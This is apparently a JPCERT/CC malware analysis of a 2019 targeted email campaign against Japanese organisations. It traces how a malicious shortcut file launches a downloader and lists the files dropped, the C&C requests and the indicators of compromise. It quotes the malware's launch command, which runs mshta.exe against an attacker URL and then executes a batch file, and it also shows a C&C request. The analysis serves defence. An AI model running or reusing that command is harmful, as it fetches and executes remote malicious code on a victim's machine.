Attack Convincing Users to Download a Malware-Containing Shortcut File
Beginning in April 2019, JPCERT/CC has been observing attacks where targeted emails are distributed to Japanese organisations, aiming to convince recipients to download a malicious shortcut file. These emails contain a link to a shortcut file on a cloud service. When this shortcut file is executed, a downloader launches.
This article is to describe the details of the downloader and the behaviour that follows.
How the downloader is launched
The following chart shows the flow of event from the shortcut file being launched until the downloader infects a host.
The shortcut files that JPCERT/CC has analysed contained the following code which downloads an HTML file (Fig 2) including VBScript. This VBScript creates and executes a VBS file (stwa.vbs) and a BAT file (Autorun.bat).
/c start /MIN %windir%\system32\mshta.exe http://pact.vgmtx.com/58l1hq/76pcik.php &ping 127.0.0.1&taskkill /f /im mshta.exe&%tmp%\Autorun.bat
When executed, stwa.vbs decodes the Base64-encoded data in the shortcut file (Fig 3) and saves it as a Windows executable file (stwa.exe) and a dummy Word file to display.
stwa.exe is in self-extract format (CAB) and creates a set of files (Table 1) when executed. Out of those, srdfqm.exe is the downloader that performs the main functions including communication.
Table 1: Files created by stwa.exe
|cp_cdis32.exe||Save srdfqm.exe in %APPDATA%\Microsoft\|
|sd.exe||Add winpt.xml and winpt_n.xml to windows task|
|winpt.xml||Task XML file*|
|winpt_n.xml||Task XML file*|
*Please refer to Appendix B for tasks that are registered.
This malware simply serves as a downloader. It performs the following communication with a C&C server when executed. The first request asks for the name of the file to download.
GET /XwuM6u/edgeside.php Host: monday.reuqest-userauth.com Accept-Encoding: identity
The second outbound communication contains the file name which is obtained as a response to the first request. A file will be downloaded from the C&C server and saved to the device.
If the download is successful, the following will be sent as the third communication:
This malware is assumed to be build based on the following code:
So far, we have not been able to identify what kind of sample this malware downloads as a result of the above communication.
Although shortcut files are often used as an entry point of an attack in many cases, adversaries have been changing the actual attack techniques around it. We assume that similar targeted attacks are likely to continue.
Tasks that are created by the samples are listed in Appendix B. Also, a list of C&C servers that we confirmed is available in Appendix D. Please make sure that none of your devices is accessing these hosts.
Thank you for reading.
Shusei Tomonaga, Wataru Takahashi
(Translated by Yukako Uchida)
Appendix A: Shortcut file information
Table 2: Data contained in the shortcut file
|Drive serial number||d0e3-15e3|
Appendix B: Registered Tasks
Table 3: Registered Task 1
Table 4: Registered Task 2
Appendix C: SHA-256 Hash Value of the sample
Appendix D: List of C&C servers